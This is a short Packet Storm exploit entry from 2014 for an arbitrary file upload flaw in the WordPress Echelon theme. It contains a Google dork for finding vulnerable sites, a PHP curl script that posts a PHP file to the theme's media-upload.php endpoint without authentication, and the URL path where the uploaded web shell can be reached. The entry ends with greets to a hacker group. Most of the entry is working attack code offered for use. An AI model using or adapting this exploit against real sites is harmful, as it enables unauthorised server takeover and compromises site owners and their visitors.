WordPress Echelon Theme Shell Upload

2014-04-25T00:00:00
ID PACKETSTORM:126327
Type packetstorm
Reporter th3rockst3r
Modified 2014-04-25T00:00:00

Description

                                        
                                            `# Exploit Author:Th3 R0cksT3r  
# Exploit Title: WordPress Echelon Theme Shell Upload  
# Date: 25.04.2014  
# Email: th3rockst3r@gmail.com   
# Vendor Homepage: http://wordpress.org/  
# Google Dork: inurl:/wp-content/themes/echelon/  
  
  
  
  
#Exploit :  
==========  
  
<?php  
$uploadfile="file.php";  
$ch = curl_init("  
http://127.0.0.1/wp-content/themes/echelon/lib/admin/functions/media-upload.php");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch,  
CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch); print "$postResult";  
?>  
  
  
=========  
  
  
  
Shell Access: http://localhost/wp-content/uploads/[years]/[month]/file.php  
  
  
  
  
  
Greets: Bangladesh Black HAT Hackers  
`